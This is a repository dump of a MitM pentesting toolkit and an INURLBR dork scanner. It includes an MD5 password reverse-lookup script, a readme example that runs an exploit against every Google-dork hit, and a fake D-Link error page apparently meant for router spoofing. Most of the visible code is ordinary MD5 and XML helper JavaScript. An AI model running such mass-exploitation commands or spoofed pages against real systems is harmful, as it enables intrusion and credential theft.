99 | \033[1;37m0x\033[0m\033[02;31mhttp://blog.inurl.com.br 100 | \033[1;37m0x\033[0m\033[02;31mhttps://fb.com/InurlBrasil 101 | \033[1;37m0x\033[0m\033[02;31mhttp://twitter.com/@googleinurl\033[0m 102 | [+] Pesquisa dados facebook, Ex: php face.php zuck 103 | "); 104 | } 105 | -------------------------------------------------------------------------------- /INURLBR/md5.php: -------------------------------------------------------------------------------- 1 | MD5 conversion and MD5 reverse lookup')) { 89 | echo "\n\033[02;31m[ {$_SESSION['config']['cont2']} ]=>MD5=>\033[1;37m{$md5}\033[0m \ SENHA:: {$result}"; 90 | echo "\033[0m\n\r-------------------------------------------------------------------------\n\r"; 91 | $_SESSION['config']['cont2'] ++; 92 | } else { 93 | renovaTOR(); 94 | } 95 | } 96 | } 97 | if (isset($opcoes['md5']) && !empty($opcoes['md5'])) { //arquivo 98 | echo menu() . "[+]Loading...\n\r"; 99 | msg($opcoes['md5'], $opcoes); 100 | } 101 | if (isset($opcoes['file']) && !empty($opcoes['file'])) { //arquivo 102 | $ponteiro = fopen($opcoes['file'], "r"); 103 | echo menu() . "[+]Loading...\n\r"; 104 | while (!feof($ponteiro)) { 105 | $md5 = str_replace("\t", '', str_replace("\n", '', str_replace("\r", '', fgets($ponteiro, 4096)))); 106 | !empty($md5) ? msg($md5, $opcoes) : NULL; 107 | } 108 | fclose($ponteiro); 109 | } 110 | echo!isset($opcoes['file']) && !isset($opcoes['md5']) ? menu() : NULL; 111 | unset($_SESSION); 112 | -------------------------------------------------------------------------------- /INURLBR/readme.txt: -------------------------------------------------------------------------------- 1 | 2 | 3 | 0xGRUPO GOOGLEINURL BRASIL - ADVANCED RESEARCH. 
4 | 0xSCRIPT NAME: INURLBR 5 | 0xAUTOR: Cleiton Pinheiro 6 | 0xNick: Googleinurl 7 | 0xBlog: http://blog.inurl.com.br 8 | 0xtwitter: /@googleinurl 9 | 0xfacebook: /InurlBrasil 10 | 0xVersão: 1.0.1 11 | 12 | 13 | 14 | 15 | [ INURLBR + NETOOL TOOLKIT INTERACTION ] 16 | +===========================================================================================+ 17 | | | 18 | | GOOGLEINURL WORK PATH : /usr/bin | 19 | | GOOGLEINURL T00LKIT PATH : /root/opensource/INURLBR | 20 | | LOGFILES STORAGE : /root/opensource/logs | 21 | | EXTERNAL SCRIPTS : http://pastebin.com/u/Googleinurl | 22 | | | 23 | | USING EXPLOITS : --comand-all "php //exploit.php _TARGET_" | 24 | | EXAMPLE : inurlbr.php --dork 'inurl:/wp-content/themes/echelon' -q 1,2,10 -s save.log | 25 | | --comand-all "php /root/opensource/INURLBR/exploit.php _TARGET_" | 26 | | | 27 | +===========================================================================================+ 28 | -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | [![Version](https://img.shields.io/badge/NETOOL-4.6-brightgreen.svg?maxAge=259200)]() 2 | [![Stage](https://img.shields.io/badge/Release-stable-blue.svg)]() 3 | [![Build](https://img.shields.io/badge/Supported_OS-linux-orange.svg)]() 4 | [![Github All Releases](https://img.shields.io/github/downloads/atom/atom/total.svg)]() 5 | [![AUR](https://img.shields.io/aur/license/yaourt.svg)]() 6 | 7 | 8 | # NETOOL - MitM pentesting toolkit [ scan/sniff/exploit ] 9 | Version release : v4.6 10 | Author : pedro ubuntu [ r00t-3xp10it ] 11 | Distros Supported : Linux Ubuntu, Kali, Mint, Parrot OS 12 | Suspicious-Shell-Activity (SSA) RedTeam develop @2016 13 | 14 | # LEGAL DISCLAIMER 15 | The author does not hold any responsibility for the bad use of this script, 16 | remember that attacking targets without prior consent is illegal and punishable 17 | by law. However, you are 
allowed to protect yourself from any intruder by any 18 | means necessary (using this tool the ethical way) please read the license. 19 | 20 | 21 | 22 | # Framework description 23 | netool.sh toolkit provides a fast and easy way for new arrivals to IT security 24 | pentesting and also for experienced users to use almost all features that the 25 | Man-In-The-Middle can provide on a local LAN, from scanning and sniffing to 26 | social engineering attacks (metasploit & veil need to be manually installed) 27 | 28 | netool toolkit is 'divided' into 3 different categories: the first stage is 29 | scanning/gathering-information using Nmap framework, the second stage is 30 | sniffing/manipulation-of-tcp-packets using Ettercap framework and the last stage 31 | uses the 'rootsector' module to deliver a payload to target (mitm+dns_spoof) 32 | 33 | # Framework additional settings 34 | Additional tool settings can be configured just by editing the 'toolkit_config' 35 | file before running the tool, settings like: config paths to frameworks installed, 36 | and some internal toolkit settings. 37 | 38 | # Dependencies 39 | Toolkit Dependencies : zenity, Nmap, Ettercap, Macchanger, Metasploit, Driftnet, Apache2, sslstrip 40 | INURLBR Dependencies : curl, libcurl3, libcurl3-dev, php5, php5-cli, php5-curl 41 | 42 | 43 | 44 | # Download/Install 45 | 1º - Download framework from github 46 | tar.gz OR zip OR git clone 47 | 48 | 2º - Install dependencies 49 | cd opensource 50 | sudo chmod +x INSTALL.sh && ./INSTALL.sh 51 | 52 | 3º - Run main tool 53 | sudo ./netool.sh 54 | 55 | # Credits 56 | Fyodor (nmap) | Alor & Naga (ettercap) | HD Moore (metasploit) 57 | Moxie M (sslstrip) | Chris L (driftnet) | j0rgan (cupp.py) 58 | ReL1K (unicorn.py) | Cleiton P (inurlbr.php) | KyRecon (shellter) 59 | Chris Tyler (zenity) and Rob McCool (apache). 
60 | 61 | 62 | _EOF 63 | 64 | -------------------------------------------------------------------------------- /files/DLINK/img_wireless_bottom.gif: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/r00t-3xp10it/netool-toolkit/adb5f1ef1d336a040313fbc0009bcf08defe8cf8/files/DLINK/img_wireless_bottom.gif -------------------------------------------------------------------------------- /files/DLINK/login.html: -------------------------------------------------------------------------------- 1 | 2 | 3 | 404 not found 4 | 5 | 6 | 7 | 8 | 9 |


we're sorry, but something went wrong. 10 | 11 |
'Please clear cache (cookies) and re-open your browser to access network'
12 |
13 | 14 | 15 | 16 | -------------------------------------------------------------------------------- /files/DLINK/logo.gif: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/r00t-3xp10it/netool-toolkit/adb5f1ef1d336a040313fbc0009bcf08defe8cf8/files/DLINK/logo.gif -------------------------------------------------------------------------------- /files/DLINK/md5.js: -------------------------------------------------------------------------------- 1 | /* 2 | * A JavaScript implementation of the RSA Data Security, Inc. MD5 Message 3 | * Digest Algorithm, as defined in RFC 1321. 4 | * Version 2.1 Copyright (C) Paul Johnston 1999 - 2002. 5 | * Other contributors: Greg Holt, Andrew Kepert, Ydnar, Lostinet 6 | * Distributed under the BSD License 7 | * See http://pajhome.org.uk/crypt/md5 for more info. 8 | */ 9 | 10 | /* 11 | * Configurable variables. You may need to tweak these to be compatible with 12 | * the server-side, but the defaults work in most cases. 13 | */ 14 | var hexcase = 0; /* hex output format. 0 - lowercase; 1 - uppercase */ 15 | var b64pad = ""; /* base-64 pad character. "=" for strict RFC compliance */ 16 | var chrsz = 8; /* bits per input character. 
8 - ASCII; 16 - Unicode */ 17 | 18 | /* 19 | * These are the functions you'll usually want to call 20 | * They take string arguments and return either hex or base-64 encoded strings 21 | */ 22 | function hex_md5(s){ return binl2hex(core_md5(str2binl(s), s.length * chrsz));} 23 | function b64_md5(s){ return binl2b64(core_md5(str2binl(s), s.length * chrsz));} 24 | function str_md5(s){ return binl2str(core_md5(str2binl(s), s.length * chrsz));} 25 | function hex_hmac_md5(key, data) { return binl2hex(core_hmac_md5(key, data)); } 26 | function b64_hmac_md5(key, data) { return binl2b64(core_hmac_md5(key, data)); } 27 | function str_hmac_md5(key, data) { return binl2str(core_hmac_md5(key, data)); } 28 | 29 | /* 30 | * Perform a simple self-test to see if the VM is working 31 | */ 32 | function md5_vm_test() 33 | { 34 | return hex_md5("abc") == "900150983cd24fb0d6963f7d28e17f72"; 35 | } 36 | 37 | /* 38 | * Calculate the MD5 of an array of little-endian words, and a bit length 39 | */ 40 | function core_md5(x, len) 41 | { 42 | /* append padding */ 43 | x[len >> 5] |= 0x80 << ((len) % 32); 44 | x[(((len + 64) >>> 9) << 4) + 14] = len; 45 | 46 | var a = 1732584193; 47 | var b = -271733879; 48 | var c = -1732584194; 49 | var d = 271733878; 50 | 51 | for(var i = 0; i < x.length; i += 16) 52 | { 53 | var olda = a; 54 | var oldb = b; 55 | var oldc = c; 56 | var oldd = d; 57 | 58 | a = md5_ff(a, b, c, d, x[i+ 0], 7 , -680876936); 59 | d = md5_ff(d, a, b, c, x[i+ 1], 12, -389564586); 60 | c = md5_ff(c, d, a, b, x[i+ 2], 17, 606105819); 61 | b = md5_ff(b, c, d, a, x[i+ 3], 22, -1044525330); 62 | a = md5_ff(a, b, c, d, x[i+ 4], 7 , -176418897); 63 | d = md5_ff(d, a, b, c, x[i+ 5], 12, 1200080426); 64 | c = md5_ff(c, d, a, b, x[i+ 6], 17, -1473231341); 65 | b = md5_ff(b, c, d, a, x[i+ 7], 22, -45705983); 66 | a = md5_ff(a, b, c, d, x[i+ 8], 7 , 1770035416); 67 | d = md5_ff(d, a, b, c, x[i+ 9], 12, -1958414417); 68 | c = md5_ff(c, d, a, b, x[i+10], 17, -42063); 69 | b = md5_ff(b, c, d, 
a, x[i+11], 22, -1990404162); 70 | a = md5_ff(a, b, c, d, x[i+12], 7 , 1804603682); 71 | d = md5_ff(d, a, b, c, x[i+13], 12, -40341101); 72 | c = md5_ff(c, d, a, b, x[i+14], 17, -1502002290); 73 | b = md5_ff(b, c, d, a, x[i+15], 22, 1236535329); 74 | 75 | a = md5_gg(a, b, c, d, x[i+ 1], 5 , -165796510); 76 | d = md5_gg(d, a, b, c, x[i+ 6], 9 , -1069501632); 77 | c = md5_gg(c, d, a, b, x[i+11], 14, 643717713); 78 | b = md5_gg(b, c, d, a, x[i+ 0], 20, -373897302); 79 | a = md5_gg(a, b, c, d, x[i+ 5], 5 , -701558691); 80 | d = md5_gg(d, a, b, c, x[i+10], 9 , 38016083); 81 | c = md5_gg(c, d, a, b, x[i+15], 14, -660478335); 82 | b = md5_gg(b, c, d, a, x[i+ 4], 20, -405537848); 83 | a = md5_gg(a, b, c, d, x[i+ 9], 5 , 568446438); 84 | d = md5_gg(d, a, b, c, x[i+14], 9 , -1019803690); 85 | c = md5_gg(c, d, a, b, x[i+ 3], 14, -187363961); 86 | b = md5_gg(b, c, d, a, x[i+ 8], 20, 1163531501); 87 | a = md5_gg(a, b, c, d, x[i+13], 5 , -1444681467); 88 | d = md5_gg(d, a, b, c, x[i+ 2], 9 , -51403784); 89 | c = md5_gg(c, d, a, b, x[i+ 7], 14, 1735328473); 90 | b = md5_gg(b, c, d, a, x[i+12], 20, -1926607734); 91 | 92 | a = md5_hh(a, b, c, d, x[i+ 5], 4 , -378558); 93 | d = md5_hh(d, a, b, c, x[i+ 8], 11, -2022574463); 94 | c = md5_hh(c, d, a, b, x[i+11], 16, 1839030562); 95 | b = md5_hh(b, c, d, a, x[i+14], 23, -35309556); 96 | a = md5_hh(a, b, c, d, x[i+ 1], 4 , -1530992060); 97 | d = md5_hh(d, a, b, c, x[i+ 4], 11, 1272893353); 98 | c = md5_hh(c, d, a, b, x[i+ 7], 16, -155497632); 99 | b = md5_hh(b, c, d, a, x[i+10], 23, -1094730640); 100 | a = md5_hh(a, b, c, d, x[i+13], 4 , 681279174); 101 | d = md5_hh(d, a, b, c, x[i+ 0], 11, -358537222); 102 | c = md5_hh(c, d, a, b, x[i+ 3], 16, -722521979); 103 | b = md5_hh(b, c, d, a, x[i+ 6], 23, 76029189); 104 | a = md5_hh(a, b, c, d, x[i+ 9], 4 , -640364487); 105 | d = md5_hh(d, a, b, c, x[i+12], 11, -421815835); 106 | c = md5_hh(c, d, a, b, x[i+15], 16, 530742520); 107 | b = md5_hh(b, c, d, a, x[i+ 2], 23, -995338651); 108 | 109 | a 
= md5_ii(a, b, c, d, x[i+ 0], 6 , -198630844); 110 | d = md5_ii(d, a, b, c, x[i+ 7], 10, 1126891415); 111 | c = md5_ii(c, d, a, b, x[i+14], 15, -1416354905); 112 | b = md5_ii(b, c, d, a, x[i+ 5], 21, -57434055); 113 | a = md5_ii(a, b, c, d, x[i+12], 6 , 1700485571); 114 | d = md5_ii(d, a, b, c, x[i+ 3], 10, -1894986606); 115 | c = md5_ii(c, d, a, b, x[i+10], 15, -1051523); 116 | b = md5_ii(b, c, d, a, x[i+ 1], 21, -2054922799); 117 | a = md5_ii(a, b, c, d, x[i+ 8], 6 , 1873313359); 118 | d = md5_ii(d, a, b, c, x[i+15], 10, -30611744); 119 | c = md5_ii(c, d, a, b, x[i+ 6], 15, -1560198380); 120 | b = md5_ii(b, c, d, a, x[i+13], 21, 1309151649); 121 | a = md5_ii(a, b, c, d, x[i+ 4], 6 , -145523070); 122 | d = md5_ii(d, a, b, c, x[i+11], 10, -1120210379); 123 | c = md5_ii(c, d, a, b, x[i+ 2], 15, 718787259); 124 | b = md5_ii(b, c, d, a, x[i+ 9], 21, -343485551); 125 | 126 | a = safe_add(a, olda); 127 | b = safe_add(b, oldb); 128 | c = safe_add(c, oldc); 129 | d = safe_add(d, oldd); 130 | } 131 | return Array(a, b, c, d); 132 | 133 | } 134 | 135 | /* 136 | * These functions implement the four basic operations the algorithm uses. 
*/

/*
 * NOTE(review): MD5 is no longer collision resistant. Treat these routines
 * as legacy compatibility code, not as a basis for new integrity checks or
 * password handling.
 */

/*
 * Shared round step: mix the round function value q into a, add the message
 * word x and the round constant t, rotate left by s bits, then add b.
 */
function md5_cmn(q, a, b, x, s, t)
{
  var mixed = safe_add(safe_add(a, q), safe_add(x, t));
  return safe_add(bit_rol(mixed, s), b);
}

/* Round 1 step: selects bits of c where b is set, bits of d elsewhere. */
function md5_ff(a, b, c, d, x, s, t)
{
  var f = (b & c) | ((~b) & d);
  return md5_cmn(f, a, b, x, s, t);
}

/* Round 2 step: selects bits of b where d is set, bits of c elsewhere. */
function md5_gg(a, b, c, d, x, s, t)
{
  var g = (b & d) | (c & (~d));
  return md5_cmn(g, a, b, x, s, t);
}

/* Round 3 step: bitwise XOR of b, c and d. */
function md5_hh(a, b, c, d, x, s, t)
{
  var h = b ^ c ^ d;
  return md5_cmn(h, a, b, x, s, t);
}

/* Round 4 step: c XOR (b OR NOT d). */
function md5_ii(a, b, c, d, x, s, t)
{
  var k = c ^ (b | (~d));
  return md5_cmn(k, a, b, x, s, t);
}

/*
 * Calculate the HMAC-MD5 of a key and some data.
 * Both arguments are strings; the result is the word array returned by
 * core_md5. Keys longer than 16 words are hashed first.
 */
function core_hmac_md5(key, data)
{
  var key_words = str2binl(key);
  if(key_words.length > 16)
    key_words = core_md5(key_words, key.length * chrsz);

  /* Build the inner and outer padded keys, one 32-bit word at a time. */
  var inner = Array(16);
  var outer = Array(16);
  for(var n = 0; n < 16; n++)
  {
    inner[n] = key_words[n] ^ 0x36363636;
    outer[n] = key_words[n] ^ 0x5C5C5C5C;
  }

  var inner_digest = core_md5(inner.concat(str2binl(data)), 512 + data.length * chrsz);
  return core_md5(outer.concat(inner_digest), 512 + 128);
}

/*
 * Add two integers with wrap-around at 2^32. The sum is built from 16-bit
 * halves to work around bugs in some JS interpreters.
 */
function safe_add(x, y)
{
  var low = (x & 0xFFFF) + (y & 0xFFFF);
  var high = (x >> 16) + (y >> 16) + (low >> 16);
  return (high << 16) | (low & 0xFFFF);
}

/*
 * Rotate a 32-bit number left by cnt bits.
 */
function bit_rol(num, cnt)
{
  var shifted_out = num >>> (32 - cnt);
  return (num << cnt) | shifted_out;
}

/*
 * Convert a string to an array of little-endian words
 * If chrsz is ASCII, characters >255 have their hi-byte silently ignored.
200 | */ 201 | function str2binl(str) 202 | { 203 | var bin = Array(); 204 | var mask = (1 << chrsz) - 1; 205 | for(var i = 0; i < str.length * chrsz; i += chrsz) 206 | bin[i>>5] |= (str.charCodeAt(i / chrsz) & mask) << (i%32); 207 | return bin; 208 | } 209 | 210 | /* 211 | * Convert an array of little-endian words to a string 212 | */ 213 | function binl2str(bin) 214 | { 215 | var str = ""; 216 | var mask = (1 << chrsz) - 1; 217 | for(var i = 0; i < bin.length * 32; i += chrsz) 218 | str += String.fromCharCode((bin[i>>5] >>> (i % 32)) & mask); 219 | return str; 220 | } 221 | 222 | /* 223 | * Convert an array of little-endian words to a hex string. 224 | */ 225 | function binl2hex(binarray) 226 | { 227 | var hex_tab = hexcase ? "0123456789ABCDEF" : "0123456789abcdef"; 228 | var str = ""; 229 | for(var i = 0; i < binarray.length * 4; i++) 230 | { 231 | str += hex_tab.charAt((binarray[i>>2] >> ((i%4)*8+4)) & 0xF) + 232 | hex_tab.charAt((binarray[i>>2] >> ((i%4)*8 )) & 0xF); 233 | } 234 | return str; 235 | } 236 | 237 | /* 238 | * Convert an array of little-endian words to a base-64 string 239 | */ 240 | function binl2b64(binarray) 241 | { 242 | var tab = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/"; 243 | var str = ""; 244 | for(var i = 0; i < binarray.length * 4; i += 3) 245 | { 246 | var triplet = (((binarray[i >> 2] >> 8 * ( i %4)) & 0xFF) << 16) 247 | | (((binarray[i+1 >> 2] >> 8 * ((i+1)%4)) & 0xFF) << 8 ) 248 | | ((binarray[i+2 >> 2] >> 8 * ((i+2)%4)) & 0xFF); 249 | for(var j = 0; j < 4; j++) 250 | { 251 | if(i * 8 + j * 6 > binarray.length * 32) str += b64pad; 252 | else str += tab.charAt((triplet >> 6*(3-j)) & 0x3F); 253 | } 254 | } 255 | return str; 256 | } 257 | 258 | function md5_js_loaded() { return true; } 259 | -------------------------------------------------------------------------------- /files/DLINK/substyle_DIR-615.css: -------------------------------------------------------------------------------- 1 | /* CSS substyle for 
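variations applicable to specific products */

#modnum_image {
	width: 125px;
	height: 25px;
	background-image: url(short_modnum_DIR-615.gif);
}
--------------------------------------------------------------------------------
/files/DLINK/xml_data.js:
--------------------------------------------------------------------------------
/*
 * xmlData class.
 * Provides a mechanism to retrieve an XML document from the server and then extract its data.
 *
 * As a first it tries to use the XML DOM model for document retrieval.
 * Failing that, we revert to using the XMLHTTP model.
 */

/*
 * Constants for the XML DOM state changes.
 */
var XML_UNINITIALIZED = 0;
var XML_LOADING = 1;
var XML_LOADED = 2;
var XML_INTERACTIVE = 3;
var XML_COMPLETED = 4;

/*
 * Global level code that detects if the browser supports the DOMParser method.
 * If it doesn't then we make our own compatibility version!
 */
if (typeof DOMParser == "undefined") {
	DOMParser = function ()
	{
	}

	/*
	 * parseFromString()
	 *	Parse an XML string into a document object.
	 *
	 * str is the XML text. content_type is the MIME type to parse it as;
	 * "application/xml" is used when it is omitted.
	 *
	 * Returns the parsed document, or null when neither ActiveXObject nor
	 * XMLHttpRequest is available.
	 */
	DOMParser.prototype.parseFromString = function (str, content_type)
	{
		/*
		 * The parameter is named content_type. The XMLHttpRequest branch used
		 * to read an undeclared contentType, which throws a ReferenceError,
		 * so resolve the MIME type once here and use it in both places.
		 */
		var mime_type = content_type || "application/xml";

		if (typeof ActiveXObject != "undefined") {
			var d = new ActiveXObject("MSXML.DomDocument");
			d.loadXML(str);
			return d;
		}
		if (typeof XMLHttpRequest != "undefined") {
			/*
			 * Synchronous request for a data: URL that carries the
			 * URI-encoded string, so the browser parses it for us.
			 */
			var req = new XMLHttpRequest;
			req.open("GET", "data:" + mime_type +
				";charset=utf-8," + encodeURIComponent(str), false);
			if (req.overrideMimeType) {
				req.overrideMimeType(mime_type);
			}
			req.send(null);
			return req.responseXML;
		}
		return null;
	}
}

/*
 * xmlDataObject_getDocument()
 *	Return this.xmlDoc.responseXML when it is set, else this.xmlDoc itself.
 */
function xmlDataObject_getDocument()
{
	if (this.xmlDoc.responseXML != null)
		return this.xmlDoc.responseXML;
	return this.xmlDoc;
}

/*
 * xmlDataObject_getElementData()
 *
 * Use the W3C DOM method for finding a tag and
 * returning the data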
content. 60 | */ 61 | function xmlDataObject_getElementData(tag_name) 62 | { 63 | /* 64 | * Slight difference depending on Mozilla/IE and Opera on how we get the XML elements 65 | */ 66 | var tag = null; 67 | try { 68 | tag = this.xmlDoc.getElementsByTagName(tag_name); 69 | } catch (e) { 70 | try { 71 | tag = this.xmlDoc.responseXML.getElementsByTagName(tag_name); 72 | } catch (ee) { 73 | return null; 74 | } 75 | } 76 | 77 | try { 78 | if (tag.length == 0) { 79 | return null; 80 | } 81 | var node = tag[0].firstChild; 82 | if (node == null) { 83 | return null; 84 | } 85 | return node.nodeValue; 86 | } catch (e) { 87 | return null; 88 | } 89 | } 90 | 91 | /* 92 | * xmlDataObject_createXMLDocument() 93 | * Creates the object used to retrieve the XML resource 94 | * 95 | * Returns true if able to create an XML retrieval document, else false. 96 | */ 97 | function xmlDataObject_createXMLDocument() 98 | { 99 | /* 100 | * Create a variable that _is_ this object so that the anonymous 101 | * functions can access it 102 | */ 103 | var xmlDataInstance = this; 104 | 105 | /* 106 | * Create an XML DOM for retrieving the data 107 | */ 108 | if ((typeof document.implementation == "object") && (typeof document.implementation.createDocument == "function")) { 109 | /* 110 | * This is Mozilla (and others) compatible and is the preferred standard for retrieving an XML document. 111 | */ 112 | this.xmlDoc = document.implementation.createDocument("", "", null); 113 | 114 | /* 115 | * Opera browsers do not support this method, however, even though they say they can! 116 | */ 117 | if (typeof this.xmlDoc.load != "undefined") { 118 | /* 119 | * Supported properly 120 | */ 121 | this.xmlDoc.onload = function () { 122 | /* 123 | * Loading can complete in error! 124 | * If there is no data then ignore (wait for timeout). 125 | */ 126 | if (xmlDataInstance.xmlDoc.firstChild == null) { 127 | return; 128 | } 129 | 130 | /* 131 | * Mozilla sets this in case of invalid XML. 
132 | */ 133 | if (xmlDataInstance.xmlDoc.firstChild.nodeName == 'parsererror') { 134 | return; 135 | } 136 | 137 | /* 138 | * Clear the timeout and signal success 139 | */ 140 | window.clearTimeout(xmlDataInstance.timeoutId); 141 | xmlDataInstance.timeoutId = 0; 142 | xmlDataInstance.dataReadyFunc(xmlDataInstance); 143 | } 144 | return true; 145 | } 146 | 147 | /* 148 | * Drop through and try Microsoft and Opera 149 | */ 150 | this.xmlDoc = null; 151 | } 152 | 153 | /* 154 | * Try IE and Opera flavours 155 | */ 156 | try { 157 | this.xmlDoc = new ActiveXObject("MSXML2.FreeThreadedDOMDocument.4.0"); 158 | } catch (e) { 159 | try { 160 | this.xmlDoc = new ActiveXObject("MSXML2.FreeThreadedDOMDocument.3.0"); 161 | } catch (e2) { 162 | try { 163 | this.xmlDoc = new ActiveXObject("Microsoft.XMLDOM"); 164 | } catch (e3) { 165 | try { 166 | this.xmlDoc = new ActiveXObject("Msxml2.XMLHTTP"); 167 | } catch (e4) { 168 | try { 169 | this.xmlDoc = new ActiveXObject("Microsoft.XMLHTTP"); 170 | } catch (e5) { 171 | try { 172 | this.xmlDoc = new XMLHttpRequest(); 173 | } catch (e6) { 174 | /* 175 | * Old unsupported browser. 176 | */ 177 | return false; 178 | } 179 | } 180 | } 181 | } 182 | } 183 | } 184 | 185 | this.xmlDoc.onreadystatechange = function () { 186 | if (xmlDataInstance.xmlDoc.readyState == XML_COMPLETED) { 187 | if (xmlDataInstance.operaRepeatedCompletionCallBugFix) { 188 | return; 189 | } 190 | 191 | /* 192 | * Opera browsers have a repeated call bug 193 | */ 194 | xmlDataInstance.operaRepeatedCompletionCallBugFix = true; 195 | 196 | /* 197 | * Some browsers have a status field that reports the GET HTML status. 
198 | * GGG - For some reason IE does not generate an exception that can be caught with try...catch for this field 199 | */ 200 | if (typeof xmlDataInstance.xmlDoc.status != "undefined") { 201 | if (xmlDataInstance.xmlDoc.status != 200) { 202 | /* 203 | * Rely on timeout 204 | */ 205 | return; 206 | } 207 | } else { 208 | /* 209 | * For browsers that do not have a status field, see if there are any XML elements 210 | */ 211 | try { 212 | if (xmlDataInstance.xmlDoc.firstChild == null) { 213 | /* 214 | * Rely on timeout 215 | */ 216 | return; 217 | } 218 | } catch (ee) { 219 | try { 220 | if (xmlDataInstance.xmlDoc.responseXML.firstChild == null) { 221 | /* 222 | * Rely on timeout 223 | */ 224 | return; 225 | } 226 | } catch (eee) { 227 | /* 228 | * Rely on timeout 229 | */ 230 | return; 231 | } 232 | } 233 | } 234 | 235 | window.clearTimeout(xmlDataInstance.timeoutId); 236 | xmlDataInstance.timeoutId = 0; 237 | xmlDataInstance.dataReadyFunc(xmlDataInstance); 238 | } 239 | } 240 | return true; 241 | } 242 | 243 | /* 244 | * xmlDataObject_initialiseFromString() 245 | * Using the given string, initialise the instance XML document. 246 | */ 247 | function xmlDataObject_initialiseFromString(xml_string) 248 | { 249 | var parser = new DOMParser(); 250 | this.xmlDoc = parser.parseFromString(xml_string, "text/xml"); 251 | } 252 | 253 | /* 254 | * xmlDataObject_retrieveData() 255 | * Begin retrieval. 256 | * 257 | * Returns false if unable to perform XML retrieval. 258 | */ 259 | function xmlDataObject_retrieveData() 260 | { 261 | /* 262 | * Ensure document retrieval is possible 263 | */ 264 | if (this.xmlDoc == null) { 265 | return false; 266 | } 267 | 268 | /* 269 | * Create a local variable that is an anonymous function to be evaluated when the timeout occurs. 270 | * The anonymous function will have access to the xmlDataObject instance! 271 | */ 272 | var xmlDataInstance = this; 273 | var fnx = function() { 274 | /* 275 | * Destroy the existing document. 
276 | */ 277 | if (xmlDataInstance.xmlDoc.abort) { 278 | xmlDataInstance.xmlDoc.abort(); 279 | } 280 | xmlDataInstance.operaRepeatedCompletionCallBugFix = false; 281 | 282 | /* 283 | * Invoke the timeout callback function 284 | */ 285 | xmlDataInstance.dataTimeoutFunc(xmlDataInstance); 286 | 287 | /* 288 | * Timer has stopped 289 | */ 290 | this.timeoutId = 0; 291 | } 292 | this.timeoutId = window.setTimeout(fnx, this.timeoutMillis); 293 | 294 | /* 295 | * Reset the opera bug fix flag 296 | */ 297 | this.operaRepeatedCompletionCallBugFix = false; 298 | 299 | /* 300 | * Start the loading of the resource 301 | */ 302 | try { 303 | /* 304 | * XML model 305 | */ 306 | this.xmlDoc.async="true"; 307 | this.xmlDoc.load(this.dataURL); 308 | } catch (e) { 309 | try { 310 | /* 311 | * HTTP XML request. 312 | */ 313 | this.xmlDoc.open('GET', this.dataURL, true); 314 | 315 | /* 316 | * Safari 1.3 bug - need to force Safari to always reload 317 | */ 318 | if (this.xmlDoc.setRequestHeader) { 319 | this.xmlDoc.setRequestHeader('If-Modified-Since', 'Wed, 15 Nov 1995 00:00:00 GMT'); 320 | } 321 | 322 | /* 323 | * Issue the request 324 | */ 325 | this.xmlDoc.send(); 326 | } catch (ee) { 327 | /* 328 | * Rely on timeout 329 | */ 330 | return false; 331 | } 332 | } 333 | return true; 334 | } 335 | 336 | /* 337 | * xmlDataObject_stopRetrieval() 338 | * Stop retrieval (if in progress). 339 | */ 340 | function xmlDataObject_stopRetrieval() 341 | { 342 | /* 343 | * Destroy the existing document. 344 | */ 345 | if (this.xmlDoc.abort) { 346 | this.xmlDoc.abort(); 347 | } 348 | this.operaRepeatedCompletionCallBugFix = false; 349 | if (this.timeoutId != 0) { 350 | window.clearTimeout(this.timeoutId); 351 | this.timeoutId = 0; 352 | } 353 | } 354 | 355 | /* 356 | * xmlDataObject() 357 | * Create an XML data object. 358 | * 359 | * Used to retrieve data from the server in XML format. 360 | * The given function is invoked when the data is retrieved. 
361 | */ 362 | function xmlDataObject(dataReadyFunc, dataTimeoutFunc, timeoutMillis, dataURL) 363 | { 364 | /* 365 | * Initialise properties. 366 | */ 367 | this.dataReadyFunc = dataReadyFunc; 368 | this.dataTimeoutFunc = dataTimeoutFunc || xmlDataObject_dataTimeoutFunc; 369 | this.dataURL = dataURL; 370 | this.timeoutMillis = timeoutMillis || 6000; 371 | this.extendedTimeoutMillis = 20000; 372 | this.timeoutId = 0; 373 | this.xmlDoc = null; 374 | 375 | this.operaRepeatedCompletionCallBugFix = false; /* To fix opera bug on getting called back more than once */ 376 | 377 | /* 378 | * Initialize the public methods 379 | */ 380 | this.retrieveData = xmlDataObject_retrieveData; 381 | this.stopRetrieval = xmlDataObject_stopRetrieval; 382 | this.getElementData = xmlDataObject_getElementData; 383 | this.getDocument = xmlDataObject_getDocument; 384 | this.initialiseFromString = xmlDataObject_initialiseFromString; 385 | 386 | /* 387 | * Initialise private methods 388 | */ 389 | this.createXMLDocument = xmlDataObject_createXMLDocument; 390 | 391 | /* 392 | * Create our XML retrieval document 393 | * NOTE: We only create one and constantly re-use it. 394 | */ 395 | this.createXMLDocument(); 396 | 397 | /* 398 | * Register this instance with a function that is to be invoked when the browser closes. 399 | * NOTE: We use the onunload event to stop XML transfers as this could hold up web browsing while 400 | * outstanding transfers complete. 401 | */ 402 | var xmlDataInstance = this; 403 | var fnx = function() { 404 | xmlDataInstance.stopRetrieval(); 405 | } 406 | add_onunload_listener(fnx); 407 | } 408 | 409 | /* 410 | * XSLT Processor class. 411 | * This class encapsulates the differences between Firefox's and IE's XSLT interfaces, 412 | * providing an external interface that is consistent across browsers. 
The general 413 | * method for using this class is as follows: 414 | * 1) Create an xsltProcessingObject 415 | * 2) Retrieve its data and wait for a callback 416 | * 3) In the callback function, apply a transformation on an XML data object and 417 | * apply the results to an existing HTML element. 418 | * 419 | * Here is the complete code for a typical usage: 420 | * 421 | * var xmlData = // Some XMLDocument - use xmlDataObject or XMLDocument, for example. 422 | * var xslt = new xsltProcessingObject(dataReady, timeout, 6000, "/transform.xslt"); 423 | * function PageLoad() 424 | * { 425 | * xslt.retrieveData(); 426 | * } 427 | * 428 | * function dataReady() 429 | * { 430 | * var parentNode = window.document.getElementById("xslt_target"); 431 | * xslt.transform(xmlData, window.document, parentNode); 432 | * parentNode.style.display = ""; // Make it visible 433 | * // Now the transformation results have been added to parentNode 434 | * } 435 | * 436 | * function timeout() 437 | * { 438 | * alert("Timeout"); 439 | * } 440 | * 441 | * // More scripting and HTML here... 442 | * 443 | * 444 | * // More HTML here... 445 | * 446 | * // 